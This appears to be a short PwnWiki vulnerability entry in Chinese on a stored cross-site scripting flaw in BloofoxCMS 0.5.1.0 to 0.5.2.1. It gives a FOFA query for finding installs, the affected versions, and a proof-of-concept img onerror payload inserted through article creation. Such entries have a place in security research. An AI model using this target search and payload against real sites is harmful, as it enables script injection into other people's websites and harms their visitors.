BloofoxCMS 0.5.2.1 存儲型XSS

From PwnWiki

Revision as of 17:17, 13 April 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="BloofoxCMS" </pre> ==影響版本== 0.5.1.0 -.5.2.1 ==XSS== 登錄有效的賬號，在添加文章的時候插入Payload發布，每次訪問均可觸...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

app="BloofoxCMS"

影響版本

0.5.1.0 -.5.2.1

XSS

登錄有效的賬號，在添加文章的時候插入Payload發布，每次訪問均可觸發：

<img src=# onerror=alert('xss')>

Retrieved from "https://pwnwiki.com/index.php?title=BloofoxCMS_0.5.2.1_存儲型XSS&oldid=1621"